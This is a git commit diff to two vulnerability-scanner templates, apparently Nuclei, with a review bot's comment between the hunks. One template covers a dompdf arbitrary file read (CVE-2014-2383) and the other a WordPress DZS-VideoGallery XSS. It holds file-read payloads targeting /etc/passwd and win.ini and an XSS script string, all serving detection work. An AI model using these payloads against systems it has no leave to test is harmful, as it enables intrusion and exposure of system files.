more updates

patch-1
sandeep 2021-09-21 15:46:26 +05:30
parent ff1537d7da
commit bcb594fc56
2 changed files with 7 additions and 8 deletions


@ -1,14 +1,14 @@
id: arbitrary-file-read-in-dompdf
id: CVE-2014-2383
info:
name: Arbitrary file read in dompdf < v0.6.0
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/33004
tags: dompdf,lfi
# - "/dompdf.php?input_file=C:/windows/win.ini"
# - "/dompdf.php?input_file=/etc/passwd"
tags: cve,cve2014,dompdf,lfi
metadata:
win-payload: "/dompdf.php?input_file=C:/windows/win.ini"
unix-payload: "/dompdf.php?input_file=/etc/passwd"
requests:
- method: GET
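Review bot: The new side of this template still carries no `description:` under `info:`, even though the other file in this commit (the DZS-VideoGallery template) gains one; the payload strings moved from the old comment lines into `metadata:` are informational only and do not explain the finding to whoever reads the scan output. Add, under `info:`, `description: "dompdf before v0.6.0 allows arbitrary file read via the input_file parameter of dompdf.php"`, worded from the existing `name:` and the two payload paths. `reference:` is also a single scalar here; a sequence of `reference:` / `  - https://www.exploit-db.com/exploits/33004` / `  - https://nvd.nist.gov/vuln/detail/CVE-2014-2383` would match the NVD-style reference used in the second file and give the new `id:` a canonical source. The `requests:` block continues past the end of this hunk.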


@ -4,9 +4,9 @@ info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,2014,wordpress,xss,wp-plugin
description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,cve2014,wordpress,xss,wp-plugin
requests:
- method: GET
@ -18,7 +18,6 @@ requests:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header